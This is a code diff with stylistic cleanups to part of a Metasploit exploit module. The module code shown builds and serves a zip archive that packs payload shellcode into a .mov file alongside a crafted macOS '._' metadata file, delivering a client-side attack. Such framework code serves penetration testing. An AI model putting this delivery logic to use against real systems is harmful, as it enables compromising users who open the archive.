@@ -47,17 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'Compat' =>
                         {
                           'PayloadType' => 'cmd',
-                          'RequiredCmd' => 'generic perl ruby telnet',
+                          'RequiredCmd' => 'generic perl ruby telnet'
                         }
         },
-        'Platform' => %w{unix},
         'Targets' => [
           # Target 0: Automatic
           [
             'Automatic',
             {
               'Platform' => [ 'unix' ],
-              'Arch' => ARCH_CMD,
+              'Arch' => ARCH_CMD
             },
           ],
         ],
@@ -73,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_dependencies
-    @zip = (Rex::FileUtils::find_full_path('7za') || Rex::FileUtils::find_full_path('7za.exe'))
+    @zip = (Rex::FileUtils.find_full_path('7za') || Rex::FileUtils.find_full_path('7za.exe'))
     return if @zip
 
-    fail_with(Failure::Unknown, "This exploit requires the zip command to be installed in your path")
+    fail_with(Failure::Unknown, 'This exploit requires the zip command to be installed in your path')
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((p = regenerate_payload(cli)).nil?)
 
     # Transmit the response to the client
     send_response(cli, generate_zip(p), { 'Content-Type' => 'application/zip' })
@@ -96,20 +95,20 @@ class MetasploitModule < Msf::Exploit::Remote
     tdir += '/' + tnam
     tmov = rand_text_alphanumeric(8) + '.mov'
 
-    FileUtils.mkdir(tdir, :mode => 0755)
+    FileUtils.mkdir(tdir, mode: 0o755)
     FileUtils.cd(tdir)
 
-    fd = File.new(tmov, "w")
+    fd = File.new(tmov, 'w')
     fd.write(shellcode.encoded)
     fd.close
 
-    FileUtils.mkdir(tdir + '/__MACOSX', :mode => 0755)
-    fd = File.new(tdir + '/__MACOSX/._' + tmov, "w")
+    FileUtils.mkdir(tdir + '/__MACOSX', mode: 0o755)
+    fd = File.new(tdir + '/__MACOSX/._' + tmov, 'w')
     fd.write(generate_metadata)
     fd.close
 
-    FileUtils.chmod(0755, tmov)
-    system(@zip, "a", tdir + '.zip', tmov, '__MACOSX/._' + tmov)
+    FileUtils.chmod(0o755, tmov)
+    system(@zip, 'a', tdir + '.zip', tmov, '__MACOSX/._' + tmov)
 
     fd = File.new(tdir + '.zip')
     data = fd.read(fd.stat.size)
